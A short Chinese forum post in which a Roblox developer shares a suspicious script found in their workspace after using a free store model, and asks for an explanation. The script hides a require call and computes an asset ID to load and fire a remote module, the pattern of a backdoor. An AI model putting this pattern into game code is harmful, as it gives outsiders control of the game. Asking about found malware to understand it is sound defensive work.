最近在商店中查找免费模型,遭遇了一个恶意脚本,这个脚本注入机制并未查找到,也还没有查找对对应的病毒源,在删除自己所有插件后,在workspace中查找到了这个恶意脚本
脚本名:enumParticleBeam
local a = script.Parent local b = game.ServerStorage _G.req = require beamrem = script local c = Instance.new("Model", workspace) local d = Instance.new("Part", c) local e = 0 local f = 3340528871.5 * 2 wait(0) _G.req(f):Fire() for g, h in pairs(workspace:GetDescendants()) do if h:IsA("RemoteEvent") then e = e + 1 end end return e
我对脚本研究不是很深,有技术大哥,可以帮忙解释下